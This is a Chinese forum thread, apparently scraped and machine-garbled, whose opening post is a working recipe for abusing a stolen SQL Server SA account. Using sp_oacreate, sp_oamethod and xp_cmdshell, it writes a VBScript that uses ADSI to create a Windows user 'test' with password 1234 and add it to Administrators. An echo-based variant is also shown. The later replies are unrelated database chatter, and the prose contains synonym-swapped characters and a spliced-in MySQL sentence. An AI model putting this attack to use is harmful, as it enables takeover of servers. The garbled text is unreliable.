仓酷云

标题: MSSQL网页编程之Microsoft SQL Server SA权限平安 [打印本页]

作者: 乐观 时间: 2015-1-16 22:15
标题: MSSQL网页编程之Microsoft SQL Server SA权限平安
由MySQL用来存储数据的文件格式以已经被广泛地测试过，但是总是有外部情况可以导致数据库表被破坏：在取得SA暗码后，常常由于服务器办理者或”后人”将net.exe和net1.exe被限定利用，没法增加办理员账号。我们晓得VBS在举动目次(ADSI)部分有一个winnt工具，用来办理当地资本，使用它能够不依托CMD等命令就可以增加一个办理员，详细代码以下：</p>在取得SA暗码后，常常由于服务器办理者或”后人”将net.exe和net1.exe被限定利用，没法增加办理员账号。我们晓得VBS在举动目次(ADSI)部分有一个winnt工具，用来办理当地资本，使用它能够不依托CMD等命令就可以增加一个办理员，详细代码以下：

　　setwsnetwork=CreateObject("WSCRIPT.NETWORK")
　　os="WinNT://"&wsnetwork.ComputerName
　　Setob=GetObject(os)失掉adsi接口,绑定
　　Setoe=GetObject(os&"/Administrators,group")属性,admin组
　　Setod=ob.Create("user","test")创建用户
　　od.SetPassword"1234"设置暗码
　　od.SetInfo保留
　　Setof=GetObject(os&"/test",user)失掉用户
　　oe.addos&"/test"

　　将下面的代码保留为1.vbs，然后实行，命令为“cscript1.vbs”，如许就会在体系增加一个体系名为test，暗码为1234的用户。详细在查询剖析器实行的代码以下：

　　declare@oint,@fint,@tint,@retint
　　execsp_oacreatescripting.filesystemobject,@oout
　　execsp_oamethod@o,createtextfile,@fout,c:1.vbs,1
　　exec@ret=sp_oamethod@f,writeline,NULL,setwsnetwork=CreateObject("WSCRIPT.NETWORK")
　　exec@ret=sp_oamethod@f,writeline,NULL,os="WinNT://"&wsnetwork.ComputerName
　　exec@ret=sp_oamethod@f,writeline,NULL,Setob=GetObject(os)
　　exec@ret=sp_oamethod@f,writeline,NULL,Setoe=GetObject(os&"/Administrators,group")
　　exec@ret=sp_oamethod@f,writeline,NULL,Setod=ob.Create("user","test")
　　exec@ret=sp_oamethod@f,writeline,NULL,od.SetPassword"1234"
　　exec@ret=sp_oamethod@f,writeline,NULL,od.SetInfo
　　exec@ret=sp_oamethod@f,writeline,NULL,Setof=GetObject(os&"/test",user)
　　exec@ret=sp_oamethod@f,writeline,NULL,oe.addos&"/test"

　　实行完下面的语句，再实行上面这行代码，这行代码必定独自实行，不要与下面的放在一同实行，不然会提醒“c:1.vbs正被另外一个程序运转”而没法乐成增加用户：

　　execmaster..xp_cmdshellcscriptc:1.vbs

　　假如体系用户没有增加乐成，有多是由于体系用户的暗码1234的太复杂，不切合服务器的庞大暗码战略，能够思索设置的庞大些，然后再测试一下。也能够利用echo将代码写到1.vbs中，代码格局为：

　　execmaster..xp_cmdshellechosetwsnetwork=CreateObject("WSCRIPT.NETWORK")>>1.vbs
对于insert操作，只需要把event_type改成DELETE_ROWS_EVENT；对于delete操作，改成WRITE_ROWS_EVENT

作者: 若天明 时间: 2015-1-26 22:39
是要和操作系统进行Socket通讯的场景。否则建议慎重！

作者: 谁可相欹 时间: 2015-2-4 22:35
这一点很好的加强了profiler的功能。但是提到profiler提醒大家注意一点。windows2003要安装sp1补丁才能启动profiler。否则点击没有反应。

作者: 再见西城 时间: 2015-2-10 22:04
一个百万级别的基本信息表A，一个百万级别的详细记录表B，A中有个身份证id，B中也有身份id；先要找出A中在B的详细记录。

作者: 简单生活 时间: 2015-3-1 16:44
索引视图2k就有。但是2005对其效率作了一些改进但是schema.viewname的作用域真是太限制了它的应用面。还有一大堆的环境参数和种种限制都让人对它有点却步。

作者: 若相依 时间: 2015-3-10 21:16
连做梦都在想页面结构是怎么样的，绝非虚言

作者: 老尸 时间: 2015-3-17 10:20
很多书籍啊，不过个人认为看书太慢，还不如自己学。多做实际的东西，就会遇到很多问题，网上搜下解决问题。不断重复这个过程，在配合sql的F1功能。

作者: 精灵巫婆 时间: 2015-3-24 07:39
只能告诉你，学好数据库语言和原理，多见识几种数据库软件，比一棵树上吊死要好。

欢迎光临仓酷云 (http://ckuyun.com/)